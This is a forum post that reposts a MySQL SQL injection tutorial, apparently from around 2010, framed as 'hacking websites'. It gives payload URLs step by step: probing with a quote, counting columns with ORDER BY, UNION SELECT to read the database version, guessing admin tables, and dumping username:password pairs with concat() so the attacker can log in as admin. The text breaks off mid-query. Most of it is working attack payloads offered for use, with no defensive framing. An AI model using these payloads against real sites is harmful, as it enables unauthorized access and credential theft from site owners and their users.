Download Free Apps & Games @ PHONEKY.com
Download Free Apps & Games @ PHONEKY.com
Subject: Hacking websites using SQL Inj
Replies: 0 Views: 1428
slik4lyf 11.02.10 - 10:45am
SQL Injection Tutorial
by Marezzi (MySQL)
In this tutorial i will
describe how sql
injection works and
how to
use it to get some
useful information.
First of all: What is SQL
injection?
It's one of the most
common vulnerability
in web applications
today.
It allows attacker to
execute database
query in url and gain
access
to some confidential
information etc...(in
shortly).
1.SQL Injection (classic
or error based or
whatever you call it) :D
2.Blind SQL Injection
(the harder part)
So let's start with
some action :D
1). Check for
vulnerability
Let's say that we have
some site like this
http://www.site.com/
news.php?id=5
Now to test if is
vulrnable we add to the
end of url ' (quote),
and that would be
http://www.site.com/
news.php?id=5'
so if we get some
error like
You have an error in
your SQL syntax;
check the manual that
corresponds to your
MySQL server version
for the right etc...
or something similar
that means is
vulrnable to sql
injection :)
2). Find the number of
columns
To find number of
columns we use
statement ORDER BY
(tells database how to
order the result)
so how to use it? Well
just incrementing the
number until we get an
error.
http://www.site.com/
news.php?id=5 order
by 1/* -- no error
http://www.site.com/
news.php?id=5 order
by 2/* -- no error
http://www.site.com/
news.php?id=5 order
by 3/* -- no error
http://www.site.com/
news.php?id=5 order
by 4/* -- error (we
get message like this
Unknown column '4' in
'order clause' or
something like that)
that means that the it
has 3 columns, cause
we got an error on 4.
3). Check for UNION
function
With union we can
select more data in
one sql statement.
so we have
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* (we
already found that
number of columns
are 3 in section 2). )
if we see some
numbers on screen, i.e
1 or 2 or 3 then the
UNION works :)
4). Check for MySQL
version
http://www.site.com/
news.php?id=5 union all
select 1,2,3/* NOTE: if /
* not working or you
get some error, then
try --
it's a comment and it's
important for our
query to work properly.
let say that we have
number 2 on the
screen, now to check
for version
we replace the number
2 with @@version or
version() and get
someting like 4.1.33-log
or 5.0.45 or similar.
it should look like this
http://www.site.com/
news.php?id=5 union all
select 1,@@version,3/
*
if you get an error
union + illegal mix of
collations (IMPLICIT +
COERCIBLE) ...
i didn't see any paper
covering this problem,
so i must write it :)
what we need is
convert() function
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,convert(@@
version using latin1),3/*
or with hex() and unhex
()
i.e.
http://www.site.com/
news.php?id=5 union all
select 1,unhex(hex(@@
version)),3/*
and you will get MySQL
version :D
5). Getting table and
column name
well if the MySQL
version is 5 (i.e 4.1.33,
4.1.12...) --- later i will
describe for MySQL 5
version.
we must guess table
and column name in
most cases.
common table names
are: user/s, admin/s,
member/s ...
common column
names are: username,
user, usr, user_name,
password, pass,
passwd, pwd etc...
i.e would be
http://www.site.com/
news.php?id=5 union all
select 1,2,3 from
admin/* (we see
number 2 on the
screen like before, and
that's good :D)
we know that table
admin exists...
now to check column
names.
http://www.site.com/
news.php?id=5 union all
select 1,username,3
from admin/* (if you
get an error, then try
the other column
name)
we get username
displayed on screen,
example would be
admin, or superadmin
etc...
now to check if column
password exists
http://www.site.com/
news.php?id=5 union all
select 1,password,3
from admin/* (if you
get an error, then try
the other column
name)
we seen password on
the screen in hash or
plain-text, it depends
of how the database is
set up :)
i.e md5 hash, mysql
hash, sha1...
now we must complete
query to look nice :)
for that we can use
concat() function (it
joins strings)
i.e
http://www.site.com/
news.php?id=5 union all
select 1,concat
(username,0x3a,
password),3 from
admin/*
Note that i put 0x3a,
its hex value for : (so
0x3a is hex value for
colon)
(there is another way
for that, char(58), ascii
value for : )
http://www.site.com/
news.php?id=5 union all
select 1,concat
(username,char(58)
,password),3 from
admin/*
now we get dislayed
username:password on
screen, i.e admin:admin
or admin:somehash
when you have this,
you can login like admin
or some superuser :D
if can't guess the right
table name, you can
always try mysql.user
(default)
it has user i password
columns, so example
would be
http://www.site.com/
news.php?id=5 union all
select 1,concat
( *
